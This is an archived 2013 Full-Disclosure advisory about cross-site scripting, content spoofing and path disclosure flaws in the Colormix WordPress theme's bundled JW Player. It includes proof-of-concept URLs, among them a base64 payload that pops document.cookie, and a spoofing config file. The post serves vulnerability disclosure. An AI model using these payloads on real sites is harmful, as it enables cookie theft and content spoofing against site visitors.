lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Sat, 20 Apr 2013 21:39:45 +0300
From: "MustLive" <mustlive@...security.com.ua>
To: <submissions@...ketstormsecurity.org>, <full-disclosure@...ts.grok.org.uk>,
 "1337 Exploit DataBase" <mr.inj3ct0r@...il.com>
Subject: Multiple vulnerabilities in Colormix theme for
	WordPress

Hello list!

Last year I've disclosed vulnerabilities in JW Player and in RokBox. Which 
were fixed by the developers - JW Player developers fixed one hole and 
promised to fix others later and RokBox fixed all holes (but it was 
questionable how they fixed holes related to JW Player).

In December I've wrote about 47 RocketTheme's themes for WordPress (which 
contain RokBox). Besides their themes I've found in December similar 
vulnerabilities in multiple themes of other developers (including custom 
themes).

Now I'll inform you about multiple vulnerabilities in Colormix theme for 
WordPress. These are Cross-Site Scripting, Content Spoofing and Full path 
disclosure vulnerabilities.

-------------------------
Affected products:
-------------------------

Affected all versions of Colormix theme for WordPress.

Other themes of this developer can be vulnerable as well.

-------------------------
Affected vendors:
-------------------------

Wordpress Themes Park
http://www.wordpressthemespark.com

----------
Details:
----------

XSS (WASC-08):

http://site/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B

Content Spoofing (WASC-12):

In parameter file there can be set as video, as audio files.

Swf-file of JW Player accepts arbitrary addresses in parameters file and 
image, which allows to spoof content of flash - i.e. by setting addresses of 
video (audio) and/or image files from other site.

http://site/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&backcolor=0xFFFFFF&screencolor=0xFFFFFF
http://site/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&image=1.jpg

Content Spoofing (WASC-12):

Swf-file of JW Player accepts arbitrary addresses in parameter config, which 
allows to spoof content of flash - i.e. by setting address of config file 
from other site (parameters file and image in xml-file accept arbitrary 
addresses). For loading of config file from other site it needs to have 
crossdomain.xml.

http://site/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?config=1.xml

1.xml

<config>
  <file>1.flv</file>
  <image>1.jpg</image>
</config>

Content Spoofing (WASC-12):

http://site/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=http://site

Full path disclosure (WASC-13):

There are FPD In folder http://site/wp-content/themes/colormix/ in index.php 
and many other php-files of theme.

------------
Timeline:
------------ 

2012.05.29 - informed developers of JW Player.
2012.08.18 - informed developers about new holes in JW Player Pro.
2012.08.28 - informed developers of Rokbox.
2012.12.14 - disclosed at my site about Rokbox.
2012.12.23 - disclosed to the lists the first part of vulnerable themes by 
RocketTheme for WordPress.
2012.12.30 - disclosed to the lists the second part of vulnerable themes by 
RocketTheme for WordPress.
2013.04.18 - disclosed at my site about Colormix theme 
(http://websecurity.com.ua/6457/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists